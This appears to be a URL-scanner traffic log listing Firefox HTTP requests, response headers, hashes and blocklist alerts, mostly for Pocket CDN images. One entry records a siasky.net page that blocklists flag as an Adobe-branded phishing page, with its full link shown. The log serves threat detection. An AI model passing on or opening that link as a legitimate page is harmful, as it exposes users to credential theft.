content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpHvHPvoAMF3mg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5564-77fd550b58af612525e74761;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:28 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: O1yNc4H21kixhUEE7099oNqs7a5ZnJBBjlZbsbmLvaXyzXzrK0dL3w==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 b36bf2c460ac693ce304817aed073112.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:44:33 GMT
age: 43759
etag: "20ef861be49c652a938e0145e4ca3a60159367e2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5504
Md5:    6c6882c60d7ca6f918c77104e3ad1d52
Sha1:   20ef861be49c652a938e0145e4ca3a60159367e2
Sha256: 861f5870990fbd2939d151ae18384cf311e87067ca9a50818efe0c2d51b83088
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9a61745f-0c9b-404a-ba22-0a69cf2f0383.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4858
x-amzn-requestid: fb21c414-2994-444a-a838-e643fd05b171
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTEfPoAMFfeQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-593dd8043b0490e7301cac0d;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: SGeDEPoXxsTV5UwkZnn3MJPbjhHhrKSsueHPxVapV_7Icl6daFk3oA==
via: 1.1 773ca14e6bd4bf9244988cb69fc9dca8.cloudfront.net (CloudFront), 1.1 89791e6b21b9a30cc51cac1bc51cf098.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:44:20 GMT
age: 43772
etag: "585e7146fd24cdc2496b05baafea04091dc541e2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4858
Md5:    6779181f9c06975f2a662da743893939
Sha1:   585e7146fd24cdc2496b05baafea04091dc541e2
Sha256: 8e9a9f92fd89b7cdce77884ccd76b83ab82d28f125ebfc1cb0d371d4046b7985
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb3178d2f-9a52-4d0e-a26b-5a90ef8578f2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3430
x-amzn-requestid: 22a0e400-1567-4c9c-aca9-782f3f81a8ef
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZKLCrEn4IAMFZWw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6333f210-11fa888c78719c44160accf8;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 07:04:49 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: czAJIO54qhc57-FC2v3o_6iUysen6MFHxo4KWJL7Uhs3ZBmRalqgMw==
via: 1.1 d1151317ba32afe0e6370fd69fed222e.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Tue, 04 Oct 2022 09:44:26 GMT
age: 566
etag: "42dd7ec0c606dbd3ccc0074f61d3b4b12f2e3c88"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3430
Md5:    488ec5b4267ccb1cdc4e6e08556f7f3b
Sha1:   42dd7ec0c606dbd3ccc0074f61d3b4b12f2e3c88
Sha256: d9b05fe92962a58b9a8e8dbd4757969aa361be12018107ae649ffcdb8a0f8d84
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0bec66cf-b911-4eb8-95d6-27e5f2afb6c7.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8308
x-amzn-requestid: 3348b2e8-915a-492b-8241-89c13a21232c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcqFlFyyoAMFz_A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b56f0-2baf7ac2213c31fc384e8317;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:41:04 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 50AX7dGWRTOAi1Z4dP9cROGeKlz-g0oXDncFUYmuPOSwpZRWWcNo4g==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 5fe5f2a3903f1378941d92eceaf3fa16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:44:32 GMT
age: 43760
etag: "4ac6c5691df804078d5da54233cf4d8e7012f9ca"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8308
Md5:    de29d0d95d22e4e246a90feed644baf0
Sha1:   4ac6c5691df804078d5da54233cf4d8e7012f9ca
Sha256: 8e34ad07e098df14f7001d1ee538479de11afa4c255006cb6e8e2207c0e50a47
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4f5624b4-8e2a-461e-a32a-38d6b5a3a8d2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11101
x-amzn-requestid: f98e84d9-1e66-4436-b793-219a777f2ba0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcqcvE8JoAMFQ2g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5784-25bd2b234c1093de70074c92;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:43:32 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: becOxfqUowywFrxzDSeK7F1lFdDVTSHIF1TLC5k5aSlLPpsR6F8gjw==
via: 1.1 cd48ffda04934d18865e47e99ea080bc.cloudfront.net (CloudFront), 1.1 35575576af8067e30cfb17c6b9fde8e2.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 22:42:37 GMT
age: 40275
etag: "db07d58d8feff4ea01866d095e5264ee5c8e1ca3"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11101
Md5:    ae824db4a95391149198a4b6b8556c70
Sha1:   db07d58d8feff4ea01866d095e5264ee5c8e1ca3
Sha256: 19e96d204813247697e1858daf9e07d6c4cafd9ab1175a3bf39a7f07f6991521
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0c459c91-b5cc-492c-9573-3101e5df6b51.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5083
x-amzn-requestid: ed99df03-5d15-4e09-9aea-bbf77a705323
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpI0HT0IAMFxvQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b556b-422197147d76caac6e910664;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:35 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: ZFVTt0eV3kpIaS4KAIZlgaTJxHb2hPxyP4BBRAZCE-cCAWJM44fZxw==
via: 1.1 946b9edb2009c5508a0fbbd636f95014.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 22:38:28 GMT
age: 40524
etag: "f5ce815082043a4efce28fc790ae7d8b3a8531f8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5083
Md5:    34f2dfb2faff276db1d4a57739db2450
Sha1:   f5ce815082043a4efce28fc790ae7d8b3a8531f8
Sha256: e02ea92f0be524ccfe26eee61a77e39a13d852d1ba3696f729e0f61812028667
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 09:53:50 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
                                        
                                            GET /JABmqDtF7k1shz0d-_PG0SfW1EjjppoM4ok9AVTbUbgodw HTTP/1.1 
Host: siasky.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         80.82.77.134
HTTP/2 200 OK
content-type: text/html
                                        
server: openresty/1.21.4.1
date: Tue, 04 Oct 2022 09:53:49 GMT
vary: Accept-Encoding
content-disposition: inline; filename="erfdcgtredrfedxs.html"
etag: W/"fda05d74689290f96a5518d8944a328e179ea9c8520f6d047a25b120f64c5449"
skynet-cache-ratio: 0.5
skynet-skylink: JABmqDtF7k1shz0d-_PG0SfW1EjjppoM4ok9AVTbUbgodw
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, HEAD, OPTIONS, PUT, PATCH, DELETE
access-control-allow-headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,If-None-Match,Cache-Control,Content-Type,Range,X-HTTP-Method-Override,upload-offset,upload-metadata,upload-length,tus-version,tus-resumable,tus-extension,tus-max-size,upload-concat,location,Skynet-API-Key
access-control-expose-headers: Content-Length,Content-Range,ETag,Accept-Ranges,Skynet-File-Metadata,Skynet-Skylink,Skynet-Proof,Skynet-Portal-Api,Skynet-Server-Api,upload-offset,upload-metadata,upload-length,tus-version,tus-resumable,tus-extension,tus-max-size,upload-concat,location
skynet-portal-api: https://siasky.net
skynet-server-api: https://eu-pol-4.siasky.net
strict-transport-security: max-age=63072000
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - openphish: Adobe Inc.
    - fortinet: Phishing
    - quad9: Sinkholed
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: siasky.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/JABmqDtF7k1shz0d-_PG0SfW1EjjppoM4ok9AVTbUbgodw
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         80.82.77.134
HTTP/2 200 OK
content-type: image/x-icon
                                        
server: openresty/1.21.4.1
date: Tue, 04 Oct 2022 09:53:51 GMT
x-powered-by: Express
access-control-allow-headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,If-None-Match,Cache-Control,Content-Type,Range,X-HTTP-Method-Override,upload-offset,upload-metadata,upload-length,tus-version,tus-resumable,tus-extension,tus-max-size,upload-concat,location,Skynet-API-Key
accept-ranges: bytes
cache-control: public, max-age=0
last-modified: Mon, 03 Oct 2022 23:29:51 GMT
etag: W/"422-183a02f3488"
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, HEAD, OPTIONS, PUT, PATCH, DELETE
access-control-expose-headers: Content-Length,Content-Range,ETag,Accept-Ranges,Skynet-File-Metadata,Skynet-Skylink,Skynet-Proof,Skynet-Portal-Api,Skynet-Server-Api,upload-offset,upload-metadata,upload-length,tus-version,tus-resumable,tus-extension,tus-max-size,upload-concat,location
skynet-portal-api: https://siasky.net
skynet-server-api: https://eu-pol-4.siasky.net
strict-transport-security: max-age=63072000
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://siasky.net
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.11.207
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
etag: W/"450fc463b8b1a349df717056fbb3e078"
last-modified: Mon, 25 Jan 2021 22:04:04 GMT
cdn-cachedat: 03/12/2022 01:19:41
cdn-proxyver: 1.02
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 756
cdn-status: 200
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-requestid: 75f0acff5fca960c7f292ab6eff51b36
cdn-cache: HIT
cf-cache-status: HIT
age: 563362
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 754d08605cc3b4fd-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /releases/v5.7.0/css/all.css HTTP/1.1 
Host: use.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://siasky.net
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.64.133.15
HTTP/2 200 OK
content-type: text/css
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
x-amz-id-2: k/nRK83VZ8/mWIFM1xhuX8fEGsM1O9L90/SjW/phslEAUiwJ32qohwkBDvGGUk7/fZ8MaUssHd0=
x-amz-request-id: 18EX2ZR03NB5QF98
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:45:15 GMT
etag: W/"251d28bd755f5269a4531df8a81d5664"
cache-control: max-age=31556926
cf-cache-status: HIT
age: 104235
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PhzrjcapgOJH5bSTHjM5xGIFpk4ggm8YEC6e19KwQ5%2BNhlDzDZGaFuTvRqIjHU85IZCYN41Ti9utOoFwEN6ZMWe2WO1%2B%2BXCgn1sUvOqy4A0gSPPaPAtBmoBEbOZmgWs9RA6ZQHVr"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 754d0860cc3774f5-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---